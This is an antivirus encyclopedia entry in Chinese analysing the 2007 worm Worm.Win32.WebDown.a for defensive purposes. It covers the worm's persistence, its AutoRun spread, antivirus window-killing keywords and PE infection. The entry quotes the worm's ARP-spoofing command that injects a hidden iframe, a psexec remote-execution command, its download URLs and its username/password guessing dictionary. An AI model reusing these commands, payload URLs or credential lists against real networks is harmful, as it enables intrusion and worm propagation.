Worm.Win32.WebDown.a

Worm.Win32.WebDown.a是一個蠕蟲型病毒,通過枚舉區域網路地址、獲取被感染者當前的連線、下載ip地址信息的方式獲取ip地址,並對這些地址嘗試進行傳播。病毒同時下載程式進行運行。病毒由VC6語言編寫,加殼保護。

基本介紹

  • 中文名:Worm.Win32.WebDown.a
  • 類型:蠕蟲型病毒
  • 危險等級:★★★
  • 截獲時間 :2007-12-20 
  • 入庫版本:20.23.32
  • 破壞手段:網路傳播、下載
病毒信息,清除方法,檢查運行狀態,初始化操作,註冊為服務運行,病毒的服務過程,在固定磁碟中建立AutoRun實現自啟動,視窗訊息處理,破壞反病毒軟體和複寫檔案,病毒的感染代碼,安全建議,

病毒信息

病毒名稱:Worm.Win32.WebDown.a
感染的作業系統:Windows所有版本系統
威脅情況:
傳播級別:高
全球化傳播態勢:低
清除難度:困難
破壞力:高

清除方法

檢查運行狀態

病毒運行後首先檢測自己的是否是以“%system32%\IME\svchost.exe”運行,如不是則進行複製自己等初始化操作,反之則以服務方式運行。

初始化操作

病毒刪除“%system32%\IME\svchost.exe”,然後複製自己為該檔案,並將屬性設定為系統、隱藏,然後病毒調用CreateProcessA啟動“%system32%\IME\svchost.exe”。
病毒啟動“%system32%\IME\svchost.exe”後,釋放批處理檔案rs.bat並執行,以此來刪除自己。

註冊為服務運行

病毒通過調用StartServiceCtrlDispatcher、CreateServiceA等函式,註冊名稱為“Alerter COM+”、目標為“%system32%\IME\svchost.exe”的服務,然後調用StartServiceA啟動服務。

病毒的服務過程

病毒調用CreateMutexA嘗試生成名為“"Alerter COM+”的互斥量,如失敗則退出,以此來保證只有一個服務實例在運行。
病毒啟動4個工作執行緒嘗試進行網路傳播和下載(詳細見後面)。
病毒根據標誌決定是否對本地固定邏輯盤建立AutoRun機制(詳細見後面)。
病毒註冊並生成視窗類名為“WebDown”、視窗名為“Alerter COM+”的隱藏視窗,並啟動訊息循環,然後向該視窗傳送WM_DEVICECHANGE訊息。

在固定磁碟中建立AutoRun實現自啟動

病毒根據標誌(寫在病毒內,推測為生成病毒時設定的)決定是否對固定硬碟建立自動運行機制。
如標誌為建立,病毒對c到z邏輯盤調用GetDriveTypeA ,對類型為DRIVE_FIXED的固定邏輯盤建立自動運行機制。
病毒複製自己到該邏輯盤根目錄下,名稱為“setup.exe”,並生成AutoRun.inf檔案以達到自動運行,病毒將setup.exe和AutoRun.inf的檔案屬性設定為系統和隱藏。

視窗訊息處理

在視窗循環中,病毒處理如下訊息:
WM_CLOSE、WM_DESTROY訊息,病毒調用默認視窗處理過程。
WM_CREATE訊息,在視窗生成的時候,病毒調用SetTimer建立兩個Timer,間隔為1秒和20分鐘,回調方式為接收WM_TIMER訊息。
WM_TIMER訊息,病毒沒隔1秒調用破壞反病毒軟體和複製自己的代碼(詳細見後面),每隔20分鐘嘗試下載http://www. XXXXX.cn/jj/svch0st.exe為本地%system32%\down.exe並運行。
WM_DEVICECHANGE訊息,病毒通過處理該訊息得到新插入的可移動設備,並對該設備進行感染(寫入病毒並建立AutoRun機制)。

破壞反病毒軟體和複寫檔案

病毒在通過處理WM_TIMER訊息,每隔1秒檢測並破壞反病毒軟體。病毒通過調用GetCursorPos、WindowFromPoint、GetParent等函式獲取當前游標下的視窗及其頂層父視窗,檢測其視窗標題中是否是或包含如下內容:
Windows 任務管理器、安全衛士、掃描、專殺、註冊表、Process、進程、木馬、防禦、防火牆、病毒、檢測、Firewall、virus、anti、金山、江民卡巴斯基、worm、防毒
如包含這些內容,病毒通過向其傳送WM_DESTROY、WM_CLOSE訊息來破壞這些視窗,以此來破壞反病毒軟體的運行。
病毒通過處理WM_TIMER訊息,每隔1秒複製自己並複寫註冊表,以保護自己。病毒將自己複製為%system32%下的internt.exe和progmon.exe,並寫入如下註冊表信息:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
\Advanced\Folder\Hidden\SHOWALL "CheckedValue" = 0X00000000
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\Run
"Internt" = %SYSTEM%\INTERNT.EXE
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\Run
"Program file" = %SYSTEM%\PROGMON.EXE
工作執行緒1:
病毒嘗試下載http://www.XXXXX.cn/jj/conn.exe為本地%system32%\BindF.exe並運行。
工作執行緒2:
病毒從http://www. XXXXX.cn/jj/下載如下檔案到%system32%\目錄:
ArpW.exe、nogui.exe、wpcap.dll、packet.dll、wanpacket.dll、arp.exe
病毒獲取當前網段(例如193.168.0.55),並將最後一個欄位替換為%s2-%s255,然後以如下參數啟動ArpW.exe。
“ArpW.exe -idx 0 -ip 193.168.0.2-255 -port 80 -insert "<iframe src='http://www.1988712.cn/jj/index.htm' width=0 height=0>"”
病毒通過下載的Arp欺騙病毒,將代碼插入區域網路中的http包中。
工作執行緒3:
病毒從病毒從http://www. XXXXX.cn/jj/下載psexec.exe和server.exe到本地%system32%目錄。
在此執行緒中,病毒每隔30分鐘循環執行如下代碼感染網路:
(1)感染區域網路計算機。病毒獲取本機ip後以此遍曆局域網,通過自帶的用戶名和密碼字典(見後面)嘗試將psexec.exe和server.exe寫入區域網路中其它計算機的%system32%目錄,然後以如下命令行啟動psexec.exe。
"%system32%\psexec.exe \\192.168.0.2 -u 用戶名 -p "密碼" -c %system32%\servrr.exe -d"
(2)感染指定ip的計算機。病毒下載"http://union.itlearner.com/ip/getip.asp",並通過在其中搜尋“input name=\"ip\”來獲取ip地址,然後利用用戶名和密碼字典嘗試對該ip地址的計算機寫入psexec.exe和server.exe並啟動運行。
(3)感染當前連線的計算機。病毒通過調用GetTcpTable、GetUdpTable等函式獲取當前連線的計算機的ip地址,然後利用用戶名和密碼字典嘗試對該ip地址的計算機寫入psexec.exe和server.exe並啟動運行。
用戶名和密碼字典如下:
用戶名:administrator、admin、guest、alex、home、love、user、game、movie、time、yeah、money、xpuser
密碼:NULL、password、123456、qwerty、abc123、memory、12345678、88888、5201314、1314520、asdfgh、angel、asdf、baby、woaini
工作執行緒4:
病毒每隔1秒,循環嘗試下載http://www. XXXXX.cn/jj/svch0st.exe到本機%system32%並運行。

病毒的感染代碼

在病毒體中包含了感染代碼,但病毒本身並未調用。該感染代碼中存在api地址硬編碼等問題,在運行時會出現問題。
在感染代碼中保護如下操作:
病毒首先複製自己為%system32\drivers\svchost.exe。
病毒將自己複製到如下目錄,名稱為隨機檔案名稱.exe:
%system32\drivers\、%system32\dllcache\、%system32\IME\
c:\Program Files\Common Files\Microsoft Shared\、
c:\Program Files\Internet Explorer\Connection Wizard\、
c:\Program Files\Windows Media Player\、
c:\WINDOWS\addins\、
c:\WINDOWS\system\
病毒遍歷c到z的邏輯盤,對所有目錄進行感染,但排除保護如下字元串的目錄:
Windows Media Player、Outlook Express、Internet Explorer、NetMeeting、ComPlus Applications;Messenger、WINNT、Documents and Settings、System Volume Information、Recycled、Windows NT、WindowsUpdate、Messenger、Microsoft Frontpage、Movie Maker、WINDOWS。
病毒只感染後綴名為exe的pe執行檔,感染時病毒在被感染檔案的代碼節的最後的內容為0的地方(為檔案對齊補的)寫入病毒代碼,並將pe頭中入口點改為指向病毒代碼。
在感染的病毒代碼中,病毒調用CreateProcessA(該函式地址為感染時寫入的硬編碼)啟動“C:\WINDOWS\system32\drivers\mmaou.exe”(感染時寫入,檔案為感染時複製的病毒本身),然後通過記錄的原入口點跳回原程式正常入口點執行。

安全建議

1 安裝正版防毒軟體個人防火牆和卡卡上網安全助手,並及時升級,瑞星防毒軟體每天至少升級三次。
2 使用“瑞星系統安全漏洞掃描”,打好補丁,彌補系統漏洞
3 不瀏覽不良網站,不隨意下載安裝可疑外掛程式。
4 不接收QQ、MSN、Emial等傳來的可疑檔案。
5 上網時打開防毒軟體實時監控功能。
6 把網銀、網遊、QQ等重要軟體加入到“瑞星帳號保險柜”中,可以有效保護密碼安全。
清除辦法:
瑞星防毒軟體清除辦法:
安裝瑞星防毒軟體,升級到20.23.32版以上,對電腦進行全盤掃描,按照軟體提示進行操作,即可徹底查殺。

相關詞條

熱門詞條

聯絡我們